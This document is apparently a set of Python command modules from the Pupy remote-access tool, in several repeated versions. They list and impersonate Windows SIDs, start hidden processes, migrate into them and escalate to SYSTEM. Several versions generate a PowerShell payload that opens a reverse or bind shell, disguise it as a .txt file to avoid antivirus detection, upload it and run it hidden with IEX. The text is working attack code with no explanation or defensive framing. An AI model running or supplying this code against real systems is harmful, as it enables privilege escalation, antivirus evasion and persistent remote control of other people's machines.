def run(self, args): if args.list: #with redirected_stdo(self.client.conn): l = obtain( self.client.conn.modules["pupwinutils.security"].ListSids()) #self.log('\n'.join(["%s : %s"%x for x in l])) self.rawlog( self.formatter.table_format( [{ "pid": x[0], "process": x[1], "sid": x[2], "username": x[3] } for x in l], wl=["pid", "process", "username", "sid"])) elif args.impersonate: if args.migrate: proc_pid = self.client.conn.modules[ "pupwinutils.security"].create_proc_as_sid( args.impersonate) migrate(self, proc_pid) else: self.client.impersonated_dupHandle = self.client.conn.modules[ "pupwinutils.security"].impersonate_sid_long_handle( args.impersonate, close=False) self.success("Sid %s impersonated !" % args.impersonate) elif args.rev2self: self.client.conn.modules["pupwinutils.security"].rev2self() self.client.impersonated_dupHandle = None self.success("rev2self called") else: self.error("no option supplied")
def run(self, args): if args.list: ListSids = self.client.remote('pupwinutils.security', 'ListSids') sids = ListSids() process_table = [] sids_table = [] sids_dict = {} for (pid, process, sid, username) in sids: process_table.append({ 'pid': pid, 'process': process, 'sid': sid, 'username': username }) sids_dict[sid] = username for sid, username in sids_dict.iteritems(): sids_table.append({ 'sid': sid, 'username': username }) self.log(MultiPart([ Table(process_table, [ 'pid', 'process', 'username', 'sid' ], caption='Process table'), Table(sids_table, [ 'sid', 'username' ], caption='Available Sids') ])) elif args.impersonate: if args.migrate: create_proc_as_sid = self.client.remote('pupwinutils.security', 'create_proc_as_sid', False) proc_pid = create_proc_as_sid(args.impersonate) migrate(self, proc_pid, keep=True) else: impersonate_sid_long_handle = self.client.remote( 'pupwinutils.security', 'impersonate_sid_long_handle', False) self.client.impersonated_dupHandle = impersonate_sid_long_handle(args.impersonate, close=False) self.success('Sid {} impersonated !'.format(args.impersonate)) elif args.rev2self: rev2self = self.client.remote('pupwinutils.security', 'rev2self', False) rev2self() self.client.impersonated_dupHandle = None self.success('rev2self called') else: self.error('no option supplied')
def run(self, args): pid=None if args.create: p=self.client.conn.modules['pupwinutils.processes'].start_hidden_process(args.create) pid=p.pid self.success("%s created with pid %s"%(args.create,pid)) else: pid=args.pid migrate(self, pid, args.keep)
def run(self, args): pid = None if args.create: p = self.client.conn.modules[ 'pupwinutils.processes'].start_hidden_process(args.create) pid = p.pid self.success("%s created with pid %s" % (args.create, pid)) else: pid = args.pid migrate(self, pid, args.keep)
def run(self, args): if args.list: #with redirected_stdo(self.client.conn): l=obtain(self.client.conn.modules["pupwinutils.security"].ListSids()) #self.log('\n'.join(["%s : %s"%x for x in l])) self.rawlog(self.formatter.table_format([{"pid": x[0], "process":x[1], "sid" : x[2], "username":x[3]} for x in l], wl=["pid", "process", "username", "sid"])) elif args.impersonate: if args.migrate: proc_pid=self.client.conn.modules["pupwinutils.security"].create_proc_as_sid(args.impersonate) migrate(self, proc_pid, keep=True) else: self.client.impersonated_dupHandle=self.client.conn.modules["pupwinutils.security"].impersonate_sid_long_handle(args.impersonate, close=False) self.success("Sid %s impersonated !"%args.impersonate) elif args.rev2self: self.client.conn.modules["pupwinutils.security"].rev2self() self.client.impersonated_dupHandle=None self.success("rev2self called") else: self.error("no option supplied")
def run(self, args): if args.list: ListSids = self.client.remote('pupwinutils.security', 'ListSids') sids = ListSids() self.table([{ 'pid': x[0], 'process': x[1], 'sid': x[2], 'username': x[3] } for x in sids], wl=['pid', 'process', 'username', 'sid']) elif args.impersonate: if args.migrate: create_proc_as_sid = self.client.remote( 'pupwinutils.security', 'create_proc_as_sid', False) proc_pid = create_proc_as_sid(args.impersonate) migrate(self, proc_pid, keep=True) else: impersonate_sid_long_handle = self.client.remote( 'pupwinutils.security', 'impersonate_sid_long_handle', False) self.client.impersonated_dupHandle = impersonate_sid_long_handle( args.impersonate, close=False) self.success('Sid {} impersonated !'.format(args.impersonate)) elif args.rev2self: rev2self = self.client.remote('pupwinutils.security', 'rev2self', False) rev2self() self.client.impersonated_dupHandle = None self.success('rev2self called') else: self.error('no option supplied')
def run(self, args): with redirected_stdo(self.client.conn): proc_pid=self.client.conn.modules["pupwinutils.security"].getsystem() migrate(self, proc_pid) self.success("got system !")
def run(self, args): with redirected_stdo(self.client.conn): proc_pid = self.client.conn.modules[ "pupwinutils.getsystem"].getsystem() migrate(self, proc_pid) self.success("got system !")
def run(self, args): # Command to execute on the target cmdToExecute = None # The the local file which contains PS1 script (when powershell chosen or enabled automcatically) local_file = '' # True if ps1 script will be used in bind mode. If reverse connection with ps1 then False isBindLauncherForPs1 = False # Contains ip:port used for bind connection on the target with ps1 script. # None if reverse connection and (consequently) isBindLauncherForPs1==False listeningAddressPortForBindPs1 = None # Usefull information for bind mode connection (ps1 script) launcherType, addressPort = self.client.desc[ 'launcher'], self.client.desc['address'] completion = None # Case of a pupy bind shell if ps1 mode is used (no reverse connection possible) if launcherType == "bind": self.info( 'The current pupy launcher is using a BIND connection. It is listening on {0} on the target' .format(addressPort)) isBindLauncherForPs1 = True self.info( 'Consequently, powershell option is enabled automatically') args.powershell = True else: self.info( 'The current pupy launcher is using a REVERSE connection (e.g. \'auto_proxy\' or \'connect\' launcher)' ) isBindLauncherForPs1 = False # A Powershell payload is used for getting a pupy session as SYSTEM if args.powershell: self.info( 'A powershell payload will be used for getting a pupy session as SYSTEM' ) clientConfToUse = None if isBindLauncherForPs1: self.info( 'Using powershell payload because the launcher on the target uses a bind connection. Launcher listens on {0}' .format(addressPort)) self.info( "Bind launcher used. So a BIND ps1 will be used in child launcher. This ps1 will listen on your given port" ) self.info( "Be careful, you have to choose a port which is not used on the target!" ) listeningPort = -1 while listeningPort == -1: try: listeningPort = int( input( "[?] Give me the listening port to use on the target: " )) except Exception as e: self.warning( "You have to give me a valid port. Try again. ({})" .format(e)) listeningAddress = addressPort.split(':')[0] listeningAddressPortForBindPs1 = "{0}:{1}".format( listeningAddress, listeningPort) self.info( "The ps1 script used for getting a pupy session as SYSTEM will be configured for listening on {0} on the target" .format(listeningAddressPortForBindPs1)) bindConf = self.client.get_conf() #Modify the listening port on the conf. If it is not modified, the ps1 script will listen on the same port as the inital pupy launcher on the target bindConf['launcher_args'][ bindConf['launcher_args'].index("--port") + 1] = str(listeningPort) clientConfToUse = bindConf else: self.info( 'Using powershell payload because you have chosen this option. The launcher on the target uses a reverse connection' ) clientConfToUse = self.client.get_conf() cmdToExecute, completion = powerloader.serve(self, clientConfToUse) # restart current exe as system if args.restart: self.info( 'Trying to configure for running the current executable on the target as SYSTEM' ) exe = self.client.desc['exec_path'].split('\\') if exe[len(exe) - 1].lower() in ['powershell.exe', 'cmd.exe' ] and exe[1].lower() == 'windows': self.warning('It seems that your current process is %s' % self.client.desc['exec_path']) self.warning('It is not recommended to restart it') return cmdToExecute = self.client.desc['exec_path'] if args.method == 'inheritance': if not cmdToExecute: cmdToExecute = args.execute if cmdToExecute is None: self.error( 'Application to execute with SYSTEM privileges should ' 'be specified with one of -x/-p/-r args') return try: enable_privilege = self.client.remote('pupwinutils.security', 'EnablePrivilege', False) enable_privilege('SeDebugPrivilege') self.success('{} enabled'.format('SeDebugPrivilege')) except Exception as e: self.error('{} was not enabled: {}'.format( 'SeDebugPrivilege', e.args[1])) create_new_process_from_ppid = self.client.remote( 'pupwinutils.security', 'create_new_process_from_ppid', False) if args.parentID: self.info( 'Using the Parent Process method on the pid {0}...'.format( args.parentID)) self.info('Command: {}'.format(cmdToExecute)) pid = create_new_process_from_ppid(int(args.parentID), cmdToExecute) self.success('Created: pid={}, ppid={}'.format( pid, args.parentID)) return else: self.info( "Getting information about all processes running on the target" ) enum_processes = self.client.remote('pupwinutils.processes', 'enum_processes') get_integrity_level = self.client.remote( 'pupwinutils.security', 'get_integrity_level', False) self.info( "Searching a process with a 'SYSTEM' integrity level") for aprocess in enum_processes(): integrityLevel = get_integrity_level(aprocess['pid']) if not integrityLevel == 'System': continue self.info( "{0} (pid {1}) has a 'SYSTEM' integrity level, trying to use it" .format(aprocess['name'], aprocess['pid'])) try: pid = create_new_process_from_ppid( aprocess['pid'], cmdToExecute) self.success('Created: pid={}, ppid={}'.format( pid, aprocess['pid'])) break except Exception as e: self.error('Failed: {}'.format(' '.join( x for x in e.args if type(x) is str))) elif args.method == 'impersonate': if cmdToExecute is None: cmdToExecute = args.execute or 'cmd.exe' getsystem = self.client.remote('pupwinutils.security', 'getsystem', False) proc_pid = getsystem(cmdToExecute) self.success('Impersonated, pid={}. Migrating..'.format(proc_pid)) migrate(self, proc_pid, keep=args.keep, timeout=args.timeout) return if args.powershell: if completion and not completion.is_set(): self.info('Waiting for PowerLoader completion') completion.wait() if isBindLauncherForPs1: self.success( 'You have to connect to the target manually on {0}: ' 'try "connect --host {0}" in pupy shell'.format( listeningAddressPortForBindPs1)) else: self.success( 'Waiting for a connection (take few seconds, 1 min max)...' ) if local_file: os.remove(local_file)
def run(self, args): local_file = '' # restart current exe as system if args.restart: self.info('Using current executable') exe = self.client.desc['exec_path'].split('\\') if exe[len(exe) - 1].lower() in ['powershell.exe', 'cmd.exe' ] and exe[1].lower() == 'windows': self.warning('It seems that your current process is %s' % self.client.desc['exec_path']) self.warning('It is not recommended to restart it') return cmd = self.client.desc['exec_path'] # use powerhell to get a reverse shell elif args.powershell: ros = self.client.conn.modules['os'] rtempfile = self.client.conn.modules['tempfile'] tempdir = rtempfile.gettempdir() random_name = ''.join([ random.choice(string.ascii_letters + string.digits) for n in xrange(6) ]) remotefile = '' self.info('Using powershell payload') if '64' in self.client.desc['os_arch']: local_file = pupygen.generate_ps1(self.client.get_conf(), x64=True) else: local_file = pupygen.generate_ps1(self.client.get_conf(), x86=True) # change the ps1 to txt file to avoid AV detection random_name += '.txt' remotefile = ros.path.join(tempdir, random_name) cmd = u'C:\Windows\System32\WindowsPowerShell\\v1.0\powershell.exe' param = u'-w hidden -noni -nop -c "cat %s | Out-String | IEX"' % remotefile cmd = '%s %s' % (cmd, param) self.info("Uploading file in %s" % remotefile) upload(self.client.conn, local_file, remotefile) # migrate else: cmd = args.prog with redirected_stdo(self): proc_pid = self.client.conn.modules[ "pupwinutils.security"].getsystem(prog=cmd) if args.migrate and not args.restart and not args.powershell: migrate(self, proc_pid) self.success("got system !") else: self.success( "Waiting for a connection (take few seconds, 1 min max)...") if args.powershell: os.remove(local_file)
def run(self, args): local_file = '' #True if ps1 script will be used in bind mode. If reverse connection with ps1 then False isBindLauncherForPs1 = False #Contains ip:port used for bind connection on the target with ps1 script. None if reverse connection and (consequently) isBindLauncherForPs1==False listeningAddressPortForBindPs1 = None #Usefull information for bind mode connection (ps1 script) launcherType, addressPort = self.client.desc['launcher'], self.client.desc['address'] #Case of a pupy bind shell if ps1 mode is used (no reverse connection possible) if launcherType == "bind": self.info('The current pupy launcher is using a BIND connection. It is listening on {0} on the target'.format(addressPort)) isBindLauncherForPs1 = True self.info('Consequently, powershell option is enabled') args.powershell = True else: self.info('The current pupy launcher is using a REVERSE connection (e.g. \'auto_proxy\' or \'connect\' launcher)') isBindLauncherForPs1 = False # restart current exe as system if args.restart: self.info('Using current executable') exe = self.client.desc['exec_path'].split('\\') if exe[len(exe)-1].lower() in ['powershell.exe', 'cmd.exe'] and exe[1].lower() == 'windows': self.warning('It seems that your current process is %s' % self.client.desc['exec_path']) self.warning('It is not recommended to restart it') return cmd = self.client.desc['exec_path'] # use powerhell to get a reverse shell elif args.powershell or isBindLauncherForPs1: clientConfToUse = None ros = self.client.conn.modules['os'] rtempfile = self.client.conn.modules['tempfile'] tempdir = rtempfile.gettempdir() random_name = ''.join([random.choice(string.ascii_letters + string.digits) for n in xrange(6)]) remotefile = '' if isBindLauncherForPs1: self.info('Using powershell payload because the launcher on the target uses a bind connection. Launcher listens on {0}'.format(addressPort)) self.info("Bind launcher used. So a BIND ps1 will be used in child launcher. This ps1 will listen on your given port") self.info("Be careful, you have to choose a port which is not used on the target!") listeningPort = -1 while listeningPort==-1: try: listeningPort = int(input("[?] Give me the listening port to use on the target: ")) except Exception as e: self.warning("You have to give me a valid port. Try again. ({})".format(e)) listeningAddress = addressPort.split(':')[0] listeningAddressPortForBindPs1 = "{0}:{1}".format(listeningAddress, listeningPort) self.info("The ps1 script used for get a System pupy shell will be configured for listening on {0} on the target".format(listeningAddressPortForBindPs1)) bindConf = self.client.get_conf() #Modify the listening port on the conf. If it is not modified, the ps1 script will listen on the same port as the inital pupy launcher on the target bindConf['launcher_args'][bindConf['launcher_args'].index("--port")+1] = str(listeningPort) clientConfToUse = bindConf else: self.info('Using powershell payload because you have chosen this option. The launcher on the target uses a reverse connection') clientConfToUse = self.client.get_conf() if '64' in self.client.desc['proc_arch']: local_file = pupygen.generate_ps1(clientConfToUse, x64=True) else: local_file = pupygen.generate_ps1(clientConfToUse, x86=True) # change the ps1 to txt file to avoid AV detection random_name += '.txt' remotefile = ros.path.join(tempdir, random_name) cmd = u'C:\Windows\System32\WindowsPowerShell\\v1.0\powershell.exe' param = u'-w hidden -noni -nop -c "cat %s | Out-String | IEX"' % remotefile cmd = '%s %s' % (cmd, param) self.info("Uploading file in %s" % remotefile) upload(self.client.conn, local_file, remotefile) # migrate else: cmd = args.prog with redirected_stdo(self): proc_pid = self.client.conn.modules["pupwinutils.security"].getsystem(prog=cmd) if args.migrate and not args.restart and not args.powershell: migrate(self, proc_pid, keep=args.keep, timeout=args.timeout) self.success("got system !") else: if isBindLauncherForPs1 == True: self.success("You have to connect to the target manually on {0}: try 'connect --host {0}' in pupy shell".format(listeningAddressPortForBindPs1)) else: self.success("Waiting for a connection (take few seconds, 1 min max)...") if args.powershell: os.remove(local_file)